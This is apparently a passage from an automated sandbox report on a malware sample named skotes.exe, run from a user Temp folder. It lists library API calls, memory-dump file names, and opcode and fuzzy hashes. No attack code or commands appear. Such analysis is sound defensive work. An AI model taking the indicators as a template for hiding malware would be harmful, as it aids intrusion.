                                                                                                                                                                                                                                                                • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00AC9550
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00AC9559
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 218105897-0
                                                                                                                                                                                                                                                                • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                                • Instruction ID: 1fd73f05549256862c205e8bfc3e6d265ee386c09d42885ff252942a79c75c7e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89F0E531200F205FE662AB68C915FAB33D99F40711F01C41EE45B9B283CF24F946CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::critical_section::unlock.LIBCMT ref: 00ABEFD1
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00ABF989
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00ABF9C0
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00ABF9CC
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ABEFDD
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF40F: Concurrency::critical_section::unlock.LIBCMT ref: 00ABF433
                                                                                                                                                                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 00ABEFE2
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC0366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00AC0368
                                                                                                                                                                                                                                                                • Concurrency::critical_section::lock.LIBCONCRT ref: 00ABF002
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00ABF8AC
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00ABF8B7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 811866635-0
                                                                                                                                                                                                                                                                • Opcode ID: 29b32be4fb9ed7da8df0da4941f3d1a3f871591b06b4538c670cdde5d47b8759
                                                                                                                                                                                                                                                                • Instruction ID: cb8381cc053e47266431cbeca273588d7e3a38471e5dd4b0856a2c36585a3c29
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b32be4fb9ed7da8df0da4941f3d1a3f871591b06b4538c670cdde5d47b8759
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96E04F34A00505AFCB04FB70CA55AEDBB65BF44360B188319E4B5172E3CF346E46CB91
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00ADDFE8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                • API String ID: 0-1793179972
                                                                                                                                                                                                                                                                • Opcode ID: a643f5267a7a1641cc802cf054d154e2c1ce3837ac35b95d4dcb021c473e3ef9
                                                                                                                                                                                                                                                                • Instruction ID: 94f42fd9022a2031e65e8b76e8e118230c5fd688e9a7efd0c32956ed32db4e5c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a643f5267a7a1641cc802cf054d154e2c1ce3837ac35b95d4dcb021c473e3ef9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59219F71644209AFDB34FF659D80E6BB7ADEF003A87104616F92A9A351F760ED10C7A1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00AD1764
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AD17AF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pContext
